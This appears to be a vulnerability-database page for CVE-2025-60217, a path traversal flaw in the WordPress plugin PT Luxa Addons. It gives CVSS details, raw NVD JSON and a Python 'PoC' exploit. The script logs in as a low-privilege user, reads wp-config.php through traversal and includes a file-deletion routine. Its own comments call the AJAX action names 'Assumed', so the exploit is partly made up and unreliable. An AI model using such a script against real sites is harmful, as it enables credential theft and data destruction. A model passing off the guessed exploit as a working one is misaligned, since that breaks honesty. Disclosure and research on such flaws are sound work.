Security Vulnerability Report
中文
CVE-2025-60217 CVSS 7.7 HIGH

CVE-2025-60217

Published: 2025-10-22 15:15:59
Last Modified: 2026-04-27 16:16:34

Description

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in ypromo PT Luxa Addons pt-luxa-addons allows Path Traversal.This issue affects PT Luxa Addons: from n/a through <= 1.2.2.

CVSS Details

CVSS Score
7.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

PT Luxa Addons (pt-luxa-addons) <= 1.2.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-60217 PT Luxa Addons Path Traversal PoC # Target: WordPress site with pt-luxa-addons plugin <= 1.2.2 # Authentication required: Low privilege (subscriber/contributor) TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "http://target-wordpress-site.com" USERNAME = sys.argv[2] if len(sys.argv) > 2 else "attacker" PASSWORD = sys.argv[3] if len(sys.argv) > 3 else "password" def exploit_path_traversal(): """Exploit path traversal to read arbitrary files""" session = requests.Session() # Login to WordPress login_url = f"{TARGET_URL}/wp-login.php" login_data = { "log": USERNAME, "pwd": PASSWORD, "wp-submit": "Log In", "redirect_to": "/wp-admin/", "testcookie": "1" } session.post(login_url, data=login_data) # Path traversal file read exploit exploit_url = f"{TARGET_URL}/wp-admin/admin-ajax.php" payload = { "action": "pt_luxa_file_read", # Assumed action name "file": "../../../../wp-config.php" # Path traversal payload } response = session.get(exploit_url, params=payload) if response.status_code == 200: print("[+] File read successful!") print("Response:", response.text[:500]) else: print("[-] Exploit failed") def exploit_file_deletion(): """Exploit path traversal to delete arbitrary files""" session = requests.Session() # Login first login_url = f"{TARGET_URL}/wp-login.php" session.post(login_url, data={"log": USERNAME, "pwd": PASSWORD}) # File deletion exploit delete_url = f"{TARGET_URL}/wp-admin/admin-ajax.php" delete_payload = { "action": "pt_luxa_file_delete", # Assumed action name "file": "../../../../wp-content/uploads/malicious.txt" } response = session.post(delete_url, data=delete_payload) if response.status_code == 200: print("[+] File deletion successful!") else: print("[-] Deletion failed") if __name__ == "__main__": print("CVE-2025-60217 PT Luxa Addons Path Traversal Exploit") print("=" * 50) exploit_path_traversal()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60217", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:15:58.967", "lastModified": "2026-04-27T16:16:33.740", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in ypromo PT Luxa Addons pt-luxa-addons allows Path Traversal.This issue affects PT Luxa Addons: from n/a through <= 1.2.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/pt-luxa-addons/vulnerability/wordpress-pt-luxa-addons-plugin-1-2-2-arbitrary-file-deletion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}